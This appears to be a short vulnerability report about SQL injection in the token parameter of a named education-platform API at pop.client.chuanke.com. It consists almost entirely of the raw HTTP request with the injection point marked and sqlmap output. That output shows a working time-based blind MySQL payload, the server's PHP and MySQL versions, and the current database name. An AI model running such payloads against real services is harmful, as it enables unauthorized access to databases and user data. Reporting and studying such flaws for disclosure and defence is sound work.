注入参数 token
 

GET /?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b*&clientType=1&mod=user&act=pushIOS HTTP/1.1 Host: pop.client.chuanke.com Accept-Language: zh-cn Connection: keep-alive Accept: */* User-Agent: ChuanKeIPhone/2.8.6 CFNetwork/672.1.14 Darwin/14.0.0 Host: pop.client.chuanke.com Pragma: no-cache Content-Type: text/html DontTrackMeHere: gzip, deflate


 

屏幕快照 2016-04-13 19.57.11.png

sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests: --- Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: https://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS --- web application technology: PHP 5.3.13 back-end DBMS: MySQL 5.0.12 sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: https://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS --- web application technology: PHP 5.3.13 back-end DBMS: MySQL >= 5.0.0 current database: 'kk_portal'